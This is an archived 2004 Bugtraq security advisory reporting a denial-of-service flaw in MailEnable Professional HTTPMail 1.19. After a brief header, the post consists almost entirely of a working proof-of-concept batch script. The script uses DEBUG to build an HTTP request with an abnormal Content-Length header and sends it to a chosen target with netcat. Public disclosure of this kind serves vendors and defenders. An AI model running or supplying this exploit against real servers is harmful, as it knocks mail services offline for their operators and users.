[35939] in bugtraq
DOS@MEHTTPS
daemon@ATHENA.MIT.EDU (CoolICE)
Mon Aug 2 16:52:41 2004
Date: Mon, 2 Aug 2004 15:18:58 +0800
From: "CoolICE" <CoolICE@China.com>
Reply-To: CoolICE@China.com
To: "suggest" <suggest@mailenable.com>
Cc: "bugtraq" <bugtraq@securityfocus.com>,
"full-disclosure" <full-disclosure@lists.netsys.com>,
"list" <list@securiteam.com>
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: 7bit
Message-ID: <Sa959197848582.18918@mx2>
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: MailEnable Professional HTTPMail
:Vendors: http://www.mailenable.com/
:Version: 1.19
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-07-30
:Author: CoolICE
:E_mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run
e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q
:run
nc %1 %PORT% < http.tmp
del http.tmp
